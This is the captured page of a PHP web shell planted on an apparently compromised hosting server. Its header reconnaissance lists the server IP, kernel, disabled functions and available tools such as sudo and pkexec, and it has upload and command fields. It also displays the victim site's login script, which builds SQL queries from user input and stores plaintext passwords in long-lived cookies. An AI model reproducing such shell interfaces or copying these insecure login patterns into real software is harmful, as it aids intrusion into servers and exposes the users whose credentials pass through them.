X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 52.15.71.146
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/www/Intellilead/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ BERANDA ]     

Current File : /home/unilinki/www/Intellilead/includes/validate.php
<?php
require_once "../includes/application_top.php";
/**if(isset($_POST['user'])){
	if(empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0){  
		$_SESSION['msg']="The Validation code does not match!";	
		header("Location: ../index.php");
		exit;
	}
}**/
$user_name = checkInput($_POST['user']);
$pass = checkInput($_POST['password']);

$sql="select * from mstr_user where user_name='$user_name' AND pass='$pass' AND status='Active'";
$result=executeQuery($sql);
if($line=mysql_fetch_array($result)){
	if(isValid_password($pass,$line['password'])){
		$_SESSION['company_id']=$line['company_id'];
		$_SESSION['user_name']=$line['user_name'];
		$_SESSION['name']=$line['name'];
		$_SESSION['user_id']=$line['user_id'];
		$_SESSION['role_id']=$line['role_id'];
		$_SESSION['rep_head']=$line['rep_head'];
		$_SESSION['user_type']=$line['user_type'];
		$_SESSION['password']=$line['pass'];
		$_SESSION['email_id']=$line['email_id'];		
		$_SESSION['client_id']=$line['client_id'];
		$_SESSION['company_name']=$line['company_name'];	
		$_SESSION['phone_no']=$line['phone_no'];
		$_SESSION['contact_no']=$line['contact_no'];
		$_SESSION['image']=$line['image'];
		$_SESSION['image_path']= "user/";
		$_SESSION['privilege']=$line['privilege'];
		$_SESSION['action']=$line['action'];
		$role = $line['role_id'];
		
		
		if(!empty($_POST["remember"])) {
				setcookie ("member_login",$_POST["user"],time()+ (10 * 365 * 24 * 60 * 60));
				setcookie ("member_password",$_POST["password"],time()+ (10 * 365 * 24 * 60 * 60));
		} else {
		if(isset($_COOKIE["member_login"])) {
			setcookie ("member_login","");
		  }
		if(isset($_COOKIE["member_password"])) {
			setcookie ("member_password","");
		   }
		}
		
		
	
		if($line['user_type']=="0"){
			//$_SESSION['privilege']=implode(',',getSingleColumn("SELECT menu_id FROM mstr_menu"));
			$_SESSION['privilege']="1,2,3";
			$_SESSION['action']="1,2,3,4";
		}else if($line['user_type']=="1"){
			//$_SESSION['privilege']=implode(',',getSingleColumn("SELECT menu_id FROM mstr_menu"));
			$_SESSION['privilege']="31";
			$_SESSION['action']="1,2,3,4";
		}else if($line['user_type']=="2"){
			//$_SESSION['privilege']=implode(',',getSingleColumn("SELECT menu_id FROM mstr_menu"));
			$_SESSION['privilege']="33";
			$_SESSION['action']="1,2,4";
		}else if(isset($line['role_id'])){
			$_SESSION['privilege']=implode(',',getSingleColumn("SELECT role_permission FROM mstr_role where role_id='$role'"));			
			$_SESSION['action']=implode(',',getSingleColumn("SELECT role_action FROM mstr_role where role_id='$role'"));			
		}
		
		
	
		
		if(!empty($line['company_id']) || $line['company_id']=='0'){					
			
			mysql_query("UPDATE mstr_user set last_login=NOW(),login_ip='".$_SERVER['REMOTE_ADDR']."' WHERE user_name='$user_name' AND pass='$pass'");	
			$Status = getSingleColumn("SELECT status FROM mstr_company where company_id='".$line['company_id']."'");
			
			if($Status[0]=='Inactive'){ 			      
				  unset($_SESSION['user_id']);
				  $_SESSION['msg']="Record Not Found in Database";				 
				  header("Location: ../index.php");
				exit;		
			}else{
				header("Location: ../template/dashboard.php");
		    	exit;	
			}
			
		}		
		
		
	}else{
		$_SESSION['msg']="Invalid Administrator ID or Password";
		header("Location: ../index.php");
		exit;
	}
}
else{
	$_SESSION['msg'] = "Invalid Administrator ID or Password";
	header("Location: ../index.php");
	exit;
}
?>

Anon7 - 2022
SCDN GOK